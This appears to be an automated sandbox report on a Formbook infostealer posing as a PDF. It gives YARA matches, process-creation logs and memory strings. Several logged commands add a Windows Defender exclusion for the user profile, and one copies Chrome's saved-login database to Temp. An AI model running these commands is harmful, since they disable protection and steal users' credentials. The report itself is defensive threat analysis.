Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1068/19@14/1

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7862060 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF7D7862060

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lxxqwri.2qj.ps1

Jump to behavior

Source: 101 2043 5770 pdf.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 45.39%

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ipconfig.exe, 00000009.00000003.2325922951.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4579575870.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000003.2216446501.000000000273B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2216846403.00000000026A5000.00000004.00001000.00020000.00000000.sdmp, DB1.11.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 101 2043 5770 pdf.exe	ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe	Virustotal: Detection: 16%

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File read: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\101 2043 5770 pdf.exe "C:\Users\user\Desktop\101 2043 5770 pdf.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
